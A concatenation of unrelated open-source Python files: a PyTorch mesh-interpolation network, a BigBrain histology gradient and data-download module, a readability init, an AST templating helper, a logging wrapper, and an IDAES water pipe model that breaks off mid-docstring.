# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import torch.nn.functional as F
from utils.arap_interpolation import *
from data.data import *
from model.layers import *
class NetParam(ParamBase):
"""Base class for hyperparameters of interpolation methods"""
def __init__(self):
super().__init__()
self.lr = 1e-4
self.num_it = 600
self.batch_size = 16
self.num_timesteps = 0
self.hidden_dim = 128
self.lambd = 1
self.lambd_geo = 50
self.log_freq = 10
self.val_freq = 10
self.log = True
class InterpolationModBase(torch.nn.Module):
def __init__(self, interp_energy: InterpolationEnergy):
super().__init__()
self.interp_energy = interp_energy
def get_pred(self, shape_x, shape_y):
raise NotImplementedError()
def compute_loss(self, shape_x, shape_y, point_pred_arr):
raise NotImplementedError()
def forward(self, shape_x, shape_y):
point_pred_arr = self.get_pred(shape_x, shape_y)
return self.compute_loss(shape_x, shape_y, point_pred_arr)
class InterpolationModGeoEC(InterpolationModBase):
def __init__(self, interp_energy: InterpolationEnergy, param=NetParam()):
super().__init__(interp_energy)
self.param = param
param.print_self()
self.rn_ec = ResnetECPos(c_dim=3, dim=7, hidden_dim=param.hidden_dim)
self.feat_module = ResnetECPos(
c_dim=param.hidden_dim, dim=6, hidden_dim=param.hidden_dim
)
print("Uses module 'InterpolationModGeoEC'")
self.Pi = None
self.Pi_inv = None
def get_pred(self, shape_x, shape_y, update_corr=True):
if update_corr:
self.match(shape_x, shape_y)
step_size = 1 / (self.param.num_timesteps + 1)
timesteps = step_size + torch.arange(0, 1, step_size, device=device).unsqueeze(
1
).unsqueeze(
2
) # [T, 1, 1]
timesteps_up = timesteps * (
torch.as_tensor([0, 0, 0, 0, 0, 0, 1], device=device, dtype=torch.float)
.unsqueeze(0)
.unsqueeze(1)
) # [T, 1, 7]
points_in = torch.cat(
(
shape_x.vert,
torch.mm(self.Pi, shape_y.vert) - shape_x.vert,
my_zeros((shape_x.vert.shape[0], 1)),
),
dim=1,
).unsqueeze(
0
) # [1, n, 7]
points_in = points_in + timesteps_up
edge_index = shape_x.get_edge_index()
displacement = my_zeros([points_in.shape[0], points_in.shape[1], 3])
for i in range(points_in.shape[0]):
displacement[i, :, :] = self.rn_ec(points_in[i, :, :], edge_index)
# the previous three lines used to support batchwise processing in torch-geometric but are now deprecated:
# displacement = self.rn_ec(points_in, edge_index) # [T, n, 3]
point_pred_arr = shape_x.vert.unsqueeze(0) + displacement * timesteps
point_pred_arr = point_pred_arr.permute([1, 2, 0])
return point_pred_arr
def compute_loss(self, shape_x, shape_y, point_pred_arr, n_normalize=201.0):
E_x_0 = self.interp_energy.forward_single(
shape_x.vert, point_pred_arr[:, :, 0], shape_x
) + self.interp_energy.forward_single(
point_pred_arr[:, :, 0], shape_x.vert, shape_x
)
lambda_align = n_normalize / shape_x.vert.shape[0]
E_align = (
lambda_align
* self.param.lambd
* (
(torch.mm(self.Pi, shape_y.vert) - point_pred_arr[:, :, -1]).norm() ** 2
+ (
shape_y.vert - torch.mm(self.Pi_inv, point_pred_arr[:, :, -1])
).norm()
** 2
)
)
if shape_x.D is None:
E_geo = my_tensor(0)
elif self.param.lambd_geo == 0:
E_geo = my_tensor(0)
else:
E_geo = (
self.param.lambd_geo
* (
(
torch.mm(torch.mm(self.Pi, shape_y.D), self.Pi.transpose(0, 1))
- shape_x.D
)
** 2
).mean()
)
E = E_x_0 + E_align + E_geo
for i in range(self.param.num_timesteps):
E_x = self.interp_energy.forward_single(
point_pred_arr[:, :, i], point_pred_arr[:, :, i + 1], shape_x
)
E_y = self.interp_energy.forward_single(
point_pred_arr[:, :, i + 1], point_pred_arr[:, :, i], shape_x
)
E = E + E_x + E_y
return E, [E - E_align - E_geo, E_align, E_geo]
def match(self, shape_x, shape_y):
feat_x = torch.cat((shape_x.vert, shape_x.get_normal()), dim=1)
feat_y = torch.cat((shape_y.vert, shape_y.get_normal()), dim=1)
feat_x = self.feat_module(feat_x, shape_x.get_edge_index())
feat_y = self.feat_module(feat_y, shape_y.get_edge_index())
feat_x = feat_x / feat_x.norm(dim=1, keepdim=True)
feat_y = feat_y / feat_y.norm(dim=1, keepdim=True)
D = torch.mm(feat_x, feat_y.transpose(0, 1))
sigma = 1e2
self.Pi = F.softmax(D * sigma, dim=1)
self.Pi_inv = F.softmax(D * sigma, dim=0).transpose(0, 1)
return self.Pi
################################################################################################
class InterpolNet:
def __init__(
self,
interp_module: InterpolationModBase,
dataset,
dataset_val=None,
time_stamp=None,
preproc_mods=[],
settings_module=None,
):
super().__init__()
self.time_stamp = time_stamp
self.interp_module = interp_module
self.settings_module = settings_module
self.preproc_mods = preproc_mods
self.dataset = dataset
if dataset is not None:
self.train_loader = torch.utils.data.DataLoader(
dataset, batch_size=1, shuffle=True
)
self.dataset_val = dataset_val
self.i_epoch = 0
self.optimizer = torch.optim.Adam(
self.interp_module.parameters(), lr=self.interp_module.param.lr
)
def train(self):
print("start training ...")
self.interp_module.train()
while self.i_epoch < self.interp_module.param.num_it:
tot_loss = 0
tot_loss_comp = None
self.update_settings()
for i, data in enumerate(self.train_loader):
shape_x = batch_to_shape(data["X"])
shape_y = batch_to_shape(data["Y"])
shape_x, shape_y = self.preprocess(shape_x, shape_y)
loss, loss_comp = self.interp_module(shape_x, shape_y)
loss.backward()
if (i + 1) % self.interp_module.param.batch_size == 0 and i < len(
self.train_loader
) - 1:
self.optimizer.step()
self.optimizer.zero_grad()
if tot_loss_comp is None:
tot_loss_comp = [
loss_comp[i].detach() / self.dataset.__len__()
for i in range(len(loss_comp))
]
else:
tot_loss_comp = [
tot_loss_comp[i]
+ loss_comp[i].detach() / self.dataset.__len__()
for i in range(len(loss_comp))
]
tot_loss += loss.detach() / self.dataset.__len__()
self.optimizer.step()
self.optimizer.zero_grad()
print(
"epoch {:04d}, loss = {:.5f} (arap: {:.5f}, reg: {:.5f}, geo: {:.5f}), reserved memory={}MB".format(
self.i_epoch,
tot_loss,
tot_loss_comp[0],
tot_loss_comp[1],
tot_loss_comp[2],
torch.cuda.memory_reserved(0) // (1024 ** 2),
)
)
if self.time_stamp is not None:
if (self.i_epoch + 1) % self.interp_module.param.log_freq == 0:
self.save_self()
if (self.i_epoch + 1) % self.interp_module.param.val_freq == 0:
self.test(self.dataset_val)
self.i_epoch += 1
def test(self, dataset, compute_val_loss=True):
test_loader = torch.utils.data.DataLoader(dataset, batch_size=1, shuffle=False)
shape_x_out = []
shape_y_out = []
points_out = []
tot_loss_val = 0
for i, data in enumerate(test_loader):
shape_x = batch_to_shape(data["X"])
shape_y = batch_to_shape(data["Y"])
shape_x, shape_y = self.preprocess(shape_x, shape_y)
point_pred = self.interp_module.get_pred(shape_x, shape_y)
if compute_val_loss:
loss, _ = self.interp_module.compute_loss(shape_x, shape_y, point_pred)
tot_loss_val += loss.detach() / len(dataset)
shape_x.detach_cpu()
shape_y.detach_cpu()
point_pred = point_pred.detach().cpu()
points_out.append(point_pred)
shape_x_out.append(shape_x)
shape_y_out.append(shape_y)
if compute_val_loss:
print("Validation loss = ", tot_loss_val)
return shape_x_out, shape_y_out, points_out
def preprocess(self, shape_x, shape_y):
for pre in self.preproc_mods:
shape_x, shape_y = pre.preprocess(shape_x, shape_y)
return shape_x, shape_y
def update_settings(self):
if self.settings_module is not None:
self.settings_module.update(self.interp_module, self.i_epoch)
def save_self(self):
folder_path = save_path(self.time_stamp)
if not os.path.isdir(folder_path):
os.mkdir(folder_path)
ckpt_last_name = "ckpt_last.pth"
ckpt_last_path = os.path.join(folder_path, ckpt_last_name)
ckpt_name = "ckpt_ep{}.pth".format(self.i_epoch)
ckpt_path = os.path.join(folder_path, ckpt_name)
self.save_chkpt(ckpt_path)
self.save_chkpt(ckpt_last_path)
def save_chkpt(self, ckpt_path):
ckpt = {
"i_epoch": self.i_epoch,
"interp_module": self.interp_module.state_dict(),
"optimizer_state_dict": self.optimizer.state_dict(),
"par": self.interp_module.param.__dict__,
}
torch.save(ckpt, ckpt_path)
def load_self(self, folder_path, num_epoch=None):
if num_epoch is None:
ckpt_name = "ckpt_last.pth"
ckpt_path = os.path.join(folder_path, ckpt_name)
else:
ckpt_name = "ckpt_ep{}.pth".format(num_epoch)
ckpt_path = os.path.join(folder_path, ckpt_name)
self.load_chkpt(ckpt_path)
if num_epoch is None:
print("Loaded model from ", folder_path, " with the latest weights")
else:
print(
"Loaded model from ",
folder_path,
" with the weights from epoch ",
num_epoch,
)
def load_chkpt(self, ckpt_path):
ckpt = torch.load(ckpt_path, map_location=device)
self.i_epoch = ckpt["i_epoch"]
self.interp_module.load_state_dict(ckpt["interp_module"])
if "par" in ckpt:
self.interp_module.param.from_dict(ckpt["par"])
self.interp_module.param.print_self()
if "optimizer_state_dict" in ckpt:
self.optimizer.load_state_dict(ckpt["optimizer_state_dict"])
self.interp_module.train()
class SettingsBase:
def update(self, interp_module, i_epoch):
raise NotImplementedError()
class SettingsFaust(SettingsBase):
def __init__(self, increase_thresh):
super().__init__()
self.increase_thresh = increase_thresh
print("Uses settings module 'SettingsFaust'")
def update(self, interp_module, i_epoch):
if i_epoch < self.increase_thresh: # 0 - 300
return
elif i_epoch < self.increase_thresh * 1.5: # 300 - 450
num_t = 1
elif i_epoch < self.increase_thresh * 1.75: # 450 - 525
num_t = 3
else: # > 525
num_t = 7
interp_module.param.num_timesteps = num_t
print("Set the # of timesteps to ", num_t)
interp_module.param.lambd_geo = 0
print("Deactivated the geodesic loss")
class PreprocessBase:
def preprocess(self, shape_x, shape_y):
raise NotImplementedError()
class PreprocessRotateBase(PreprocessBase):
def __init__(self, axis=1):
super().__init__()
self.axis = axis
def _create_rot_matrix(self, alpha):
return create_rotation_matrix(alpha, self.axis)
def _rand_rot(self):
alpha = torch.rand(1) * 360
return self._create_rot_matrix(alpha)
def rot_sub(self, shape, r):
if shape.sub is not None:
for i_p in range(len(shape.sub[0])):
shape.sub[0][i_p][0, :, :] = torch.mm(shape.sub[0][i_p][0, :, :], r)
if shape.vert_full is not None:
shape.vert_full = torch.mm(shape.vert_full, r)
return shape
def preprocess(self, shape_x, shape_y):
raise NotImplementedError()
class PreprocessRotate(PreprocessRotateBase):
def __init__(self, axis=1):
super().__init__(axis)
print("Uses preprocessing module 'PreprocessRotate'")
def preprocess(self, shape_x, shape_y):
r_x = self._rand_rot()
r_y = self._rand_rot()
shape_x.vert = torch.mm(shape_x.vert, r_x)
shape_y.vert = torch.mm(shape_y.vert, r_y)
shape_x = self.rot_sub(shape_x, r_x)
shape_y = self.rot_sub(shape_y, r_y)
return shape_x, shape_y
class PreprocessRotateSame(PreprocessRotateBase):
def __init__(self, axis=1):
super().__init__(axis)
print("Uses preprocessing module 'PreprocessRotateSame'")
def preprocess(self, shape_x, shape_y):
r = self._rand_rot()
shape_x.vert = torch.mm(shape_x.vert, r)
shape_y.vert = torch.mm(shape_y.vert, r)
shape_x = self.rot_sub(shape_x, r)
shape_y = self.rot_sub(shape_y, r)
return shape_x, shape_y
class PreprocessRotateAugment(PreprocessRotateBase):
def __init__(self, axis=1, sigma=0.3):
super().__init__(axis)
self.sigma = sigma
print(
"Uses preprocessing module 'PreprocessRotateAugment' with sigma =",
self.sigma,
)
def preprocess(self, shape_x, shape_y):
r_x = self._rand_rot_augment()
r_y = self._rand_rot_augment()
shape_x.vert = torch.mm(shape_x.vert, r_x)
shape_y.vert = torch.mm(shape_y.vert, r_y)
shape_x = self.rot_sub(shape_x, r_x)
shape_y = self.rot_sub(shape_y, r_y)
return shape_x, shape_y
# computes a pair of approximately similar rotation matrices
def _rand_rot_augment(self):
rot = torch.randn(
[3, 3], dtype=torch.float, device=device
) * self.sigma + my_eye(3)
U, _, V = torch.svd(rot, compute_uv=True)
rot = torch.mm(U, V.transpose(0, 1))
return rot
if __name__ == "__main__":
print("main of interpolation_net.py")
|
""" Histology context decoder """
from pathlib import Path
import logging
import urllib.request
import shutil
import numpy as np
import h5py
from brainspace.gradient.gradient import GradientMaps
from brainspace.utils.parcellation import reduce_by_labels
def compute_histology_gradients(
mpc,
kernel="normalized_angle",
approach="dm",
n_components=10,
alignment=None,
random_state=None,
gamma=None,
sparsity=0.9,
reference=None,
n_iter=10,
):
"""Computes microstructural profile covariance gradients.
Parameters
----------
mpc : numpy.ndarray
Microstructural profile covariance matrix.
kernel : str, optional
Kernel function to build the affinity matrix. Possible options: {‘pearson’,
‘spearman’, ‘cosine’, ‘normalized_angle’, ‘gaussian’}. If callable, must
receive a 2D array and return a 2D square array. If None, use input matrix.
By default "normalized_angle".
approach : str, optional
Embedding approach. Can be 'pca' for Principal Component Analysis, 'le' for
laplacian eigenmaps, or 'dm' for diffusion mapping, by default "dm".
n_components : int, optional
Number of components to return, by default 10.
alignment : str, None, optional
Alignment approach. Only used when two or more datasets are provided.
Valid options are 'pa' for procrustes analysis and "joint" for joint embedding.
If None, no alignment is peformed, by default None.
random_state : int, None, optional
Random state, by default None
gamma : float, None, optional
Inverse kernel width. Only used if kernel == "gaussian". If None, gamma=1/n_feat,
by default None.
sparsity : float, optional
Proportion of smallest elements to zero-out for each row, by default 0.9.
reference : numpy.ndarray, optional
Initial reference for procrustes alignments. Only used when
alignment == 'procrustes', by default None.
n_iter : int, optional
Number of iterations for Procrustes alignment, by default 10.
Returns
-------
brainspace.gradient.gradient.GradientMaps
BrainSpace gradient maps object.
"""
gm = GradientMaps(
kernel=kernel,
approach=approach,
n_components=n_components,
alignment=alignment,
random_state=random_state,
)
gm.fit(mpc, gamma=gamma, sparsity=sparsity, n_iter=n_iter, reference=reference)
return gm
def compute_mpc(profile, labels):
"""Computes MPC for given labels on a surface template.
Parameters
----------
profile : numpy.ndarray
Histological profiles of size surface-by-vertex.
labels : numpy.ndarray
Labels of regions of interest. Use 0 to denote regions that will not be included.
Returns
-------
numpy.ndarray
Microstructural profile covariance.
"""
roi_profile = reduce_by_labels(profile, labels)
if np.any(labels == 0):
# Remove 0's in the labels.
roi_profile = roi_profile[:, 1:]
p_corr = partial_correlation(roi_profile, np.mean(roi_profile, axis=1))
mpc = 0.5 * np.log((1 + p_corr) / (1 - p_corr))
mpc[p_corr > 0.99999] = 0 # Deals with floating point issues where p_corr==1
mpc[mpc == np.inf] = 0
mpc[mpc == np.nan] = 0
return mpc
def read_histology_profile(data_dir=None, template="fsaverage", overwrite=False):
"""Reads BigBrain histology profiles.
Parameters
----------
data_dir : str, None, optional
Path to the data directory. If data is not found here then data will be
downloaded. If None, data_dir is set to the home directory, by default None.
template : str, optional
Surface template. Currently allowed options are 'fsaverage' and 'fs_LR', by
default 'fsaverage'.
overwrite : bool, optional
If true, existing data will be overwrriten, by default False.
Returns
-------
numpy.ndarray
Depth-by-vertex array of BigBrain intensities.
"""
if data_dir is None:
data_dir = Path.home() / "histology_data"
else:
data_dir = Path(data_dir)
histology_file = data_dir / ("histology_" + template + ".h5")
if not histology_file.exists() or overwrite:
logging.info(
"Could not find a histological profile or an overwrite was requested. Downloading..."
)
download_histology_profiles(
data_dir=data_dir, template=template, overwrite=overwrite
)
with h5py.File(histology_file, "r") as h5_file:
return h5_file.get(template)[...]
def download_histology_profiles(data_dir=None, template="fsaverage", overwrite=False):
"""Downloads BigBrain histology profiles.
Parameters
----------
data_dir : str, None, optional
Path to the directory to store the data. If None, defaults to the home
directory, by default None.
template : str, optional
Surface template. Currently allowed options are 'fsaverage' and 'fs_LR', by
default 'fsaverage'.
overwrite : bool, optional
If true, existing data will be overwrriten, by default False.
Raises
------
KeyError
Thrown if an invalid template is requested.
"""
if data_dir is None:
data_dir = Path.home() / "histology_data"
else:
data_dir = Path(data_dir)
data_dir.mkdir(parents=True, exist_ok=True)
output_file = data_dir / ("histology_" + template + ".h5")
urls = _get_urls()
try:
_download_file(urls[template], output_file, overwrite)
except KeyError:
raise KeyError(
"Could not find the requested template. Valid templates are: 'fs_LR_64k', 'fsaverage', 'fsaverage5'."
)
def partial_correlation(X, covar):
"""Runs a partial correlation whilst correcting for a covariate.
Parameters
----------
X : numpy.ndarray
Two-dimensional array of the data to be correlated.
covar : numpy.ndarray
One-dimensional array of the covariate.
Returns
-------
numpy.ndarray
Partial correlation matrix.
"""
X_mean = np.concatenate((X, covar[:, None]), axis=1)
pearson_correlation = np.corrcoef(X_mean, rowvar=False)
r_xy = pearson_correlation[:-1, :-1]
r_xz = pearson_correlation[0:-1, -1][:, None]
return (r_xy - r_xz @ r_xz.T) / (np.sqrt(1 - r_xz ** 2) * np.sqrt(1 - r_xz.T ** 2))
def _get_urls():
"""Stores the URLs for histology file downloads.
Returns
-------
dict
Dictionary with template names as keys and urls to the files as values.
"""
return {
"fsaverage": "https://box.bic.mni.mcgill.ca/s/znBp7Emls0mMW1a/download",
"fsaverage5": "https://box.bic.mni.mcgill.ca/s/N8zstvuRb4sNcSe/download",
"fs_LR_64k": "https://box.bic.mni.mcgill.ca/s/6zKHcg9xXu5inPR/download",
}
def _download_file(url, output_file, overwrite):
"""Downloads a file.
Parameters
----------
url : str
URL of the download.
file : pathlib.Path
Path object of the output file.
overwrite : bool
If true, overwrite existing files.
"""
if output_file.exists() and not overwrite:
logging.debug(str(output_file) + " already exists and will not be overwritten.")
return
logging.debug("Downloading " + str(output_file))
with urllib.request.urlopen(url) as response, open(output_file, "wb") as out_file:
shutil.copyfileobj(response, out_file)
|
__version__ = "0.8.1.1"
from .readability import Document
|
# Copyright 2021 The Blqs Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import textwrap
from typing import Iterable
import gast
class ReplacementTransformer(gast.NodeTransformer):
def __init__(self, **replacements):
self.replacements = replacements
def visit_Name(self, node):
if node.id in self.replacements:
replacement = self.replacements[node.id]
if isinstance(replacement, str):
node.id = replacement
else:
return replacement
return node
def visit_FunctionDef(self, node):
node = self.generic_visit(node)
if node.name in self.replacements:
node.name = self.replacements[node.name]
return node
def visit_Expr(self, node):
# If we changed things, return it outside of an expression.
visited_node = self.visit(node.value)
if visited_node is node.value:
return node
return visited_node
def replace(template: str, **replacements) -> Iterable:
"""A simple templating system.
Rules:
* Replaces `Name` nodes with either the nodes that are the replacements, or if
the replacement is a string replaces the id of the `Name`.
* Replaces the name of a `FunctionDef` with a possible string replacement.
* Replaces an `Expr` wholesale with the supplied replacement nodes.
Args:
template: A string containing python code. The code can have placeholder names
that will be replaced by this call.
**replacements: Keyword arguments from the placeholder name in the code to the `gast.Node`,
a sequence of the `gast.Node`s representing the code that should be replaced,
or a string, which is used to replace an `id` or `name` as described above.
Returns:
A list of the `gast.Node`s representing the template with replaced nodes.
"""
nodes = gast.parse(textwrap.dedent(template))
transformer = ReplacementTransformer(**replacements)
replaced_nodes = transformer.visit(nodes)
return replaced_nodes.body
|
import logging
logging.basicConfig(filename='marvin.log',level=logging.DEBUG)
logger = logging.getLogger('MARVIN')
logger.setLevel(logging.DEBUG)
def consoleDebugActive(consoleActivated):
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
if(consoleActivated):
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
def debug(message):
logger.debug(message)
def info(message):
logger.info(message)
def warn(message):
logger.warn(message)
def error(message):
logger.error(message)
def critical(message):
logger.critical(message)
|
#################################################################################
# The Institute for the Design of Advanced Energy Systems Integrated Platform
# Framework (IDAES IP) was produced under the DOE Institute for the
# Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021
# by the software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University
# Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and
# license information.
#################################################################################
"""
Pipe model for water or steam, Liq or Vap phase must be provided (mixed phase
not supported).
main equations:
* Heat is given (zero if adiabatic)
* Calculate pressure change due to friction and gravity
* Assume enthalpy_in = enthalpy_out + heat
Created: April 2019 by Jinliang Ma
"""
# Import Pyomo libraries
from pyomo.common.config import ConfigBlock, ConfigValue, In, Bool
# Import IDAES cores
from idaes.core import (
ControlVolume0DBlock,
declare_process_block_class,
MaterialBalanceType,
EnergyBalanceType,
MomentumBalanceType,
UnitModelBlockData,
useDefault,
)
from idaes.core.util.config import is_physical_parameter_block
from idaes.core.util.constants import Constants as const
from idaes.core.solvers import get_solver
import idaes.logger as idaeslog
# Additional import for the unit operation
from pyomo.environ import SolverFactory, value, Var, Reference
__author__ = "Boiler Subsystem Team (J. Ma, M. Zamarripa)"
__version__ = "2.0.0"
@declare_process_block_class("WaterPipe")
class WaterPipeData(UnitModelBlockData):
"""
Water or steam pipe Unit Class
"""
CONFIG = UnitModelBlockData.CONFIG()
CONFIG.declare(
"material_balance_type",
ConfigValue(
default=MaterialBalanceType.componentPhase,
domain=In(MaterialBalanceType),
description="Material balance construction flag",
doc="""Indicates what type of material balance should be constructed,
**default** - MaterialBalanceType.componentPhase.
**Valid values:** {
**MaterialBalanceType.none** - exclude material balances,
**MaterialBalanceType.componentPhase** - use phase component balances,
**MaterialBalanceType.componentTotal** - use total component balances,
**MaterialBalanceType.elementTotal** - use total element balances,
**MaterialBalanceType.total** - use total material balance.}""",
),
)
CONFIG.declare(
"energy_balance_type",
ConfigValue(
default=EnergyBalanceType.enthalpyTotal,
domain=In(EnergyBalanceType),
description="Energy balance construction flag",
doc="""Indicates what type of energy balance should be constructed,
**default** - EnergyBalanceType.enthalpyTotal.
**Valid values:** {
**EnergyBalanceType.none** - exclude energy balances,
**EnergyBalanceType.enthalpyTotal** - single ethalpy balance for material,
**EnergyBalanceType.enthalpyPhase** - ethalpy balances for each phase,
**EnergyBalanceType.energyTotal** - single energy balance for material,
**EnergyBalanceType.energyPhase** - energy balances for each phase.}""",
),
)
CONFIG.declare(
"momentum_balance_type",
ConfigValue(
default=MomentumBalanceType.pressureTotal,
domain=In(MomentumBalanceType),
description="Momentum balance construction flag",
doc="""Indicates what type of momentum balance should be constructed,
**default** - MomentumBalanceType.pressureTotal.
**Valid values:** {
**MomentumBalanceType.none** - exclude momentum balances,
**MomentumBalanceType.pressureTotal** - single pressure balance for material,
**MomentumBalanceType.pressurePhase** - pressure balances for each phase,
**MomentumBalanceType.momentumTotal** - single momentum balance for material,
**MomentumBalanceType.momentumPhase** - momentum balances for each phase.}""",
),
)
CONFIG.declare(
"has_heat_transfer",
ConfigValue(
default=False,
domain=Bool,
description="Heat transfer term construction flag",
doc="""Indicates whether terms for heat transfer should be constructed,
**default** - False.
**Valid values:** {
**True** - include heat transfer terms,
**False** - exclude heat transfer terms.}""",
),
)
CONFIG.declare(
"has_pressure_change",
ConfigValue(
default=True,
domain=Bool,
description="Pressure change term construction flag",
doc="""Indicates whether terms for pressure change should be
constructed,
**default** - False.
**Valid values:** {
**True** - include pressure change terms,
**False** - exclude pressure change terms.}""",
),
)
CONFIG.declare(
"property_package",
ConfigValue(
default=useDefault,
domain=is_physical_parameter_block,
description="Property package to use for control volume",
doc="""Property parameter object used to define property calculations,
**default** - useDefault.
**Valid values:** {
**useDefault** - use default package from parent model or flowsheet,
**PhysicalParameterObject** - a PhysicalParameterBlock object.}""",
),
)
CONFIG.declare(
"property_package_args",
ConfigBlock(
implicit=True,
description="Arguments to use for constructing property packages",
doc="""A ConfigBlock with arguments to be passed to a property block(s)
and used when constructing these,
**default** - None.
**Valid values:** {
see property package for documentation.}""",
),
)
CONFIG.declare(
"contraction_expansion_at_end",
ConfigValue(
default="None",
domain=In(["None", "contraction", "expansion"]),
description="Any contraction or expansion at the end",
doc="Define if pressure drop due to contraction"
" or expansion needs to be considered",
),
)
CONFIG.declare(
"water_phase",
ConfigValue(
default="Liq",
domain=In(["Liq", "Vap"]),
description="Water phase",
doc="""Define water phase for property calls,
mixed phase not supported""",
),
)
def build(self):
"""
Begin building model
"""
# Call UnitModel.build to setup dynamics
super(WaterPipeData, self).build()
# Build Control Volume
self.control_volume = ControlVolume0DBlock(
default={
"dynamic": self.config.dynamic,
"has_holdup": self.config.has_holdup,
"property_package": self.config.property_package,
"property_package_args": self.config.property_package_args,
}
)
self.control_volume.add_geometry()
self.control_volume.add_state_blocks(has_phase_equilibrium=False)
self.control_volume.add_material_balances(
balance_type=self.config.material_balance_type,
)
self.control_volume.add_energy_balances(
balance_type=self.config.energy_balance_type,
has_heat_transfer=self.config.has_heat_transfer,
)
self.control_volume.add_momentum_balances(
balance_type=self.config.momentum_balance_type, has_pressure_change=True
)
# Add Ports
self.add_inlet_port()
self.add_outlet_port()
# Add object references
self.volume = Reference(self.control_volume.volume)
# Set references to balance terms at unit level
if (
self.config.has_heat_transfer is True
and self.config.energy_balance_type != EnergyBalanceType.none
):
self.heat_duty = Reference(self.control_volume.heat)
if (
self.config.has_pressure_change is True
and self.config.momentum_balance_type != "none"
):
self.deltaP = Reference(self.control_volume.deltaP)
# Set Unit Geometry and Volume
self._set_geometry()
# Construct performance equations
self._make_performance()
def _set_geometry(self):
"""
Define the geometry of the unit as necessary
"""
# Number of pipe
self.number_of_pipes = Var(initialize=4, doc="Number of pipes")
# Length of pipe
self.length = Var(initialize=10.0, doc="Total length of the straight pipe")
# Elevation change of pipe, elevation of outlet - elevation of inlet
self.elevation_change = Var(
initialize=10.0, doc="Change of elevation from inlet to outlet"
)
# Inside diameter of pipe
self.diameter = Var(initialize=0.6, doc="Inside diameter of pipe")
if not self.config.contraction_expansion_at_end == "None":
self.area_ratio = Var(
initialize=1, doc="Cross section area ratio of exit end to pipe"
)
# Volume constraint
@self.Constraint(self.flowsheet().time, doc="Total volume of all pipes")
def volume_eqn(b, t):
return (
b.volume[t]
== 0.25 * const.pi * b.diameter**2 * b.length * b.number_of_pipes
)
def _make_performance(self):
"""
Define constraints which describe the behaviour of the unit model.
"""
phase = self.config.water_phase
# Add performance variables
# Velocity of fluid inside pipe
self.velocity = Var(
self.flowsheet().time, initialize=10.0, doc="Fluid velocity inside pipe"
)
# Reynolds number
self.N_Re = Var(
self.flowsheet().time, initialize=10000.0, doc="Reynolds number"
)
# Darcy friction factor
self.friction_factor_darcy = Var(
self.flowsheet().time, initialize=0.005, doc="Darcy friction factor"
)
# Correction factor for pressure drop due to friction
self.fcorrection_dp = Var(
initialize=1.0, doc="Correction factor for pressure drop"
)
# Pressure change due to friction
self.deltaP_friction = Var(
self.flowsheet().time,
initialize=-1.0,
doc="Pressure change due to friction",
)
# Pressure change due to gravity
self.deltaP_gravity = Var(
self.flowsheet().time, initialize=0.0, doc="Pressure change due to gravity"
)
# Pressure change due to area change at end
self.deltaP_area_change = Var(
self.flowsheet().time,
initialize=0.0,
doc="Pressure change due to area change",
)
# Equation for calculating velocity
@self.Constraint(self.flowsheet().time, doc="Velocity of fluid inside pipe")
def velocity_eqn(b, t):
return (
b.velocity[t] * 0.25 * const.pi * b.diameter**2 * b.number_of_pipes
== b.control_volume.properties_in[t].flow_vol
)
# Equation for calculating Reynolds number
@self.Constraint(self.flowsheet().time, doc="Reynolds number")
def Reynolds_number_eqn(b, t):
return (
b.N_Re[t] * b.control_volume.properties_in[t].visc_d_phase[phase]
== b.diameter
* b.velocity[t]
* b.control_volume.properties_in[t].dens_mass_phase[phase]
)
# Friction factor expression depending on laminar or turbulent flow
@self.Constraint(
self.flowsheet().time,
doc="Darcy friction factor as" " a function of Reynolds number",
)
def friction_factor_darcy_eqn(b, t):
return (
b.friction_factor_darcy[t] * b.N_Re[t] ** (0.25)
== 0.3164 * b.fcorrection_dp
)
# Pressure change equation for friction
@self.Constraint(self.flowsheet().time, doc="Pressure change due to friction")
def pressure_change_friction_eqn(b, t):
return (
b.deltaP_friction[t] * b.diameter
== -0.5
* b.control_volume.properties_in[t].dens_mass_phase[phase]
* b.velocity[t] ** 2
* b.friction_factor_darcy[t]
* b.length
)
# Pressure change equation for gravity
@self.Constraint(self.flowsheet().time, doc="Pressure change due to gravity")
def pressure_change_gravity_eqn(b, t):
return (
b.deltaP_gravity[t]
== -const.acceleration_gravity
* b.control_volume.properties_in[t].dens_mass_phase[phase]
* b.elevation_change
)
# Pressure change equation for contraction or expansion
@self.Constraint(self.flowsheet().time, doc="Pressure change due to gravity")
def pressure_change_area_change_eqn(b, t):
if self.config.contraction_expansion_at_end == "contraction":
return (
b.deltaP_area_change[t]
== -(0.1602 * b.area_ratio**2 - 0.646 * b.area_ratio + 1.4858)
* 0.5
* b.control_volume.properties_out[t].dens_mass_phase[phase]
* (b.velocity[t] / b.area_ratio) ** 2
+ 0.5
* b.control_volume.properties_out[t].dens_mass_phase[phase]
* b.velocity[t] ** 2
)
elif self.config.contraction_expansion_at_end == "expansion":
return (
b.deltaP_area_change[t]
== b.control_volume.properties_out[t].dens_mass_phase[phase]
* b.velocity[t] ** 2
* (b.area_ratio - 1)
/ b.area_ratio**2
)
else:
return b.deltaP_area_change[t] == 0
# Total pressure change equation
@self.Constraint(self.flowsheet().time, doc="Pressure drop")
def pressure_change_total_eqn(b, t):
return b.deltaP[t] == (
b.deltaP_friction[t] + b.deltaP_gravity[t] + b.deltaP_area_change[t]
)
def set_initial_condition(self):
if self.config.dynamic is True:
self.control_volume.material_accumulation[:, :, :].value = 0
self.control_volume.energy_accumulation[:, :].value = 0
self.control_volume.material_accumulation[0, :, :].fix(0)
self.control_volume.energy_accumulation[0, :].fix(0)
def initialize_build(
blk, state_args=None, outlvl=idaeslog.NOTSET, solver=None, optarg=None
):
"""
WaterPipe initialization routine.
Keyword Arguments:
